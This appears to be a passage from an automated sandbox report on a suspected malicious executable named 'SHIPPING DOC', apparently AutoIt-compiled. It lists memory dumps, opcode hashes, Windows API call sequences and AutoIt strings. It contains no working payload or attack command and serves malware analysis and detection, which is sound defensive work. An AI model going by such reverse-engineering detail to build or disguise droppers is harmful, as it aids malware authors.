                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction ID: 8451161bdfdd6a61b8689ae0f02856bbf493ca72f02b4fd9fa6d77e04e33c6a1
                                                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction Fuzzy Hash: 0241A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction ID: 7732fbbd70ab07fb92277a40a7c8f5d0d3225e31dec1f29e7581908ab8fd0d3d
                                                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction Fuzzy Hash: F0014078A11209EFCB88DF99C5909AEF7B5FB48210B248599D919EB741E730AE41DB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction ID: 4bdca308a0c4bc2d3fcab9565719822c027fb7b991d64f7c099549afda9f9cb4
                                                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction Fuzzy Hash: 39019278A10209EFCB84DF98C5909AEF7F9FB48310F208599D919EB301E730AE41DB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                      • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                      • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                      • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                      • _wcslen.LIBCMT ref: 00459916
                                                                                                                      • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                      • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 4040870279-2373415609
                                                                                                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                      • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                      • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69173610-0
                                                                                                                      • Opcode ID: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                                                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                      • Opcode Fuzzy Hash: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                                                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-3360698832
                                                                                                                      • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                      • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                      • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                      • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                      • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                      • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                      • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                      • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                      • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                      • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                      • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                      • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1675784387-0
                                                                                                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                      • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                      • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
